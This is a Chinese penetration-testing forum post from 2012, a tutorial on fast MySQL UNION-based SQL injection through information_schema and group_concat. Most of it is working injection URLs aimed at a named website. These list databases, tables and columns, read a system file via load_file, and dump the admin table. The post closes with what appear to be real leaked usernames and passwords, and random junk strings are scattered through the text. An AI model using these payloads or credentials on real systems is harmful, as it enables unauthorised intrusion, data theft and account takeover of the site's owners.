中国网络渗透测试联盟
标题:
mysql注入高效方法
[打印本页]
作者:
admin
时间:
2012-9-13 16:37
标题:
mysql注入高效方法
此方法只适用于Mysql 5.0以及5.0以上版本 注入方法和mysql 5 类似
: q5 }, e; y/ `/ M
但此方法大大提高了读取数据库的速度,此方法并非本人原创,原创出处是国外某牛人
8 m5 \$ J1 c- r* o6 x
y1 Q& b+ Q, b- _; J, O# R
6 H, u7 r0 T. g+ p3 [% Y6 j
优点在于可以利用information_schema库与group_concat的配合 来达到一次性读取出指定数据库里的内容,并且在limit被限制的情况下依然可以注入
- E" [4 m$ Y }; v" J
6 F p- i1 d* n+ s
缺点 当一个库存在几百甚至几千个表和表字段和数据的时候 读取出数据的时间会相当的慢...
" ]0 u( Q3 Q: i
! n# ]) }& l5 `5 e
下面用简单实例来演示 原理不多说,相信经常玩注入的朋友都知道了.只挑重要部分实例演示
1 m1 ]" |4 @ G4 F! ~3 m W) V
在注入时根据实际情况作出变化 比如过滤了空格,使用/**/ , + 等等
6 E: x( P, a; p$ @
0 G( o& p8 }+ L0 U
http://www.political-security.com/1.php?id=-1
union select 1,2,3,4,5,6,7,8,database(),10,11,12,13,14,15,16,17
: K' A& t8 K( O# w
( R, C% a- O2 `' p! e
读出所有库:
8 P. d$ F4 V8 f
http://www.political-security.com/1.php?id=-1
union select 1,2,3,4,5,6,7,8,group_concat(schema_name),10,11,12,13,14,15,16,17 from information_schema.SCHEMATA
, O1 V7 C4 Z: V7 q" r
1 v; X, P- K1 B; C% L8 g" H4 r j& r
4 d, `8 ]1 k1 P4 G0 Y
$ \' z0 v# C. Y2 ~
读出所有表:
% _- U: Z6 S4 v1 }( ~* w3 D; j8 U
http://www.political-security.com/1.php?id=-1
union select 1,2,3,4,5,6,7,8,group_concat(table_name),10,11,12,13,14,15,16,17 from information_schema.tables where table_schema=database()
2 p2 P J# O- s8 o& ^, x8 Q
: M. }; Q. F5 D3 O. j( A
读出所有表字段:
4 w! b' {, @9 i* g9 D
http://www.political-security.com/1.php?id=-1
union select 1,2,3,4,5,6,7,8,group_concat(column_name),10,11,12,13,14,15,16,17 from information_schema.COLUMNS where table_schema=database() and table_name=char(97,100,109,105,110)
2 D+ q% O& P$ l$ d( ^0 ?
*/ (97,100,109,105,110)为admin的ascii码 依次类推
* W' O) [9 o! R, \. m, r
. J+ h: S4 ? d! x0 W" \
读出所有表字段里的内容:
3 v4 }) q! w9 k
http://www.political-security.com/1.php?id=-1
union select 1,2,3,4,5,6,7,group_concat(password),group_concat(admin),10,11,12,13,14,15,16,17 from admin
% w, W/ p* _2 p( P% t0 ?
$ W, e/ W4 \% [4 n: P) e" o8 [# Z
2 G7 Z, [2 l, Y0 v( _( G9 v6 @( J. K! H
3 h @" R% f) g
6 K3 ~4 {; {4 ^5 ~/ ?; d
+ k; r- C9 u( |
9 ]' R. l" \# |4 B
http://www.political-security.co ... ;&ssec=-1+UNION
SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),load_file(CHAR(99, 58, 92, 98, 111, 111, 116, 46, 105, 110, 105)),4,5,6,7+%23
9 g) B% Z+ T1 _1 K7 \" z
2 p7 ~' _- M2 R$ c% E. s9 j
$ W% u- B' ]8 R% L7 w
http://www.political-security.co ... ;&ssec=-1+UNION
SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(schema_name),4,5,6,7+from+information_schema.schemata%23
. ^+ \$ A2 [2 ]. l& r
. l4 E T: b; `0 Y; B9 |4 z2 X
http://www.political-security.co ... ;&ssec=-1+UNION
SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(column_name),4,5,6,7+from+information_schema.COLUMNS where table_schema=database()+and+table_name=char(97,100,109,105,110)%23
1 B# N" u+ _, d D1 ^9 L
* \3 V0 N: J4 m- X2 b5 _# s
1 Q% J' f9 y$ S8 ?) d1 f
http://www.political-security.co ... ;&ssec=-1+UNION
SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(admin_name,0x3a,admin_password),4,5,6,7+from+admin%23
) B* j7 b% M, |( e% k6 g
/ B$ e0 O3 A$ |# H% D
% @: d" B' w% s9 [6 l: U
webmaster:dzb521123,simlab:simadmin20043233
& U/ U ]) B! g( N8 H# r
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2